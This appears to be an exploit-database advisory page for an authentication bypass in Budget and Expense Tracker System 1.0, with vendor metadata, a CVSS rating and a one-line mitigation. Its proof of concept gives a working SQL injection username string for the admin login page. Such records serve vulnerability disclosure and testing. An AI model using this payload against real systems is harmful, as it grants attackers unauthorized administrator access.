header-logo
Suggest Exploit
vendor:
Budget and Expense Tracker System
by:
Prunier Charles-Yves
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Budget and Expense Tracker System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: None
CPE: a:oretnom23:budget_and_expense_tracker_system:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2021

Budget and Expense Tracker System 1.0 – Authenticated Bypass

Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application allowing the attacker to login with admin acount

Mitigation:

Ensure that authentication is properly implemented and enforced in the application
Source

Exploit-DB raw data:

# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
# Exploit Author: Prunier Charles-Yves
# Date: September 20, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0

# Exploit Description:
Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application 
allowing the attacker to login with admin acount


----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/expense_budget/admin/login.php

Username: admin' or ''=' --